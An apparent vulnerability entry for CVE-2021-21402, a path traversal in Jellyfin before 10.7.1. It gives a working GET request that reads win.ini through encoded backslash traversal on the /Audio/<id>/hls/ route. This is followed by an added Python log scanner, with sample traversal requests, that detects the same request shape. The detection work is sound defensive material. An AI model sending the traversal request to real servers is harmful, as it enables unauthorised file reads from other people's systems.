    CVE-2021-21402 Jellyfin Arbitrary File Read Vulnerability

    Affected versions:

    • Jellyfin < 10.7.1

    Exp:

    GET /Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/
    Host:xxx.xxx.xxx.xxx
    Content-Type: application/octet-stream
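
A log check for the request shape shown above, as an added example that is not part of the original page or of the Jellyfin project: it flags requests to the /Audio/<id>/hls/ route whose remaining path contains a ".." segment after percent-decoding. The access-log format, the sample lines and all function names are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Request line inside a common/combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?"')
# Route shape taken from the request on this page: /Audio/<id>/hls/<rest>
HLS_ROUTE_RE = re.compile(r'^/audio/[^/]+/hls/(?P<rest>.*)$', re.IGNORECASE)

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input (%255C) is normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal_attempt(target):
    """True when an /Audio/<id>/hls/ request carries a '..' path segment."""
    path = fully_decode(target.split('?', 1)[0])  # drop query string, then decode
    match = HLS_ROUTE_RE.match(path)
    if not match:
        return False
    # Split on both separators: the request on this page uses encoded backslashes.
    return '..' in re.split(r'[\\/]', match.group('rest'))

def scan(lines):
    """Return (client, request target) for every suspicious log line."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if m and is_traversal_attempt(m.group('target')):
            hits.append((line.split(' ', 1)[0], m.group('target')))
    return hits

# Constructed sample log lines (documentation IP ranges, made-up item ids).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Apr/2021:10:00:00 +0000] "GET /Audio/1/hls/..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/ HTTP/1.1" 200 92',
    '203.0.113.7 - - [01/Apr/2021:10:00:02 +0000] "GET /Audio/1/hls/..%255C..%255Cdata/stream.mp3/ HTTP/1.1" 404 0',
    '198.51.100.4 - - [01/Apr/2021:10:00:05 +0000] "GET /Audio/3f2a/hls/segment0/stream.mp3 HTTP/1.1" 200 40960',
    '198.51.100.4 - - [01/Apr/2021:10:00:06 +0000] "GET /web/index.html HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for client, target in scan(SAMPLE_LOG):
        print(client, target)
```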